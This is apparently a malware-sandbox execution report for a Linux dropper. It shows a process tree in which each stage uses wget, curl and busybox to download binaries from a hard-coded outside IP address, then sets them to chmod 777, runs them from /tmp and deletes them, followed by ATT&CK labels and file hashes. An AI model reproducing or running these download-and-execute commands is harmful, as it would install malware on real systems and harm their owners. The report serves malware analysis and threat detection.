/usr/bin/curlcurl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:960
-
-
/bin/chmodchmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:966
-
-
/bin/chmodchmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:972
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:978
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:984
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:990
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:993
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:994
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Reads runtime system information
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:996
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:999
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97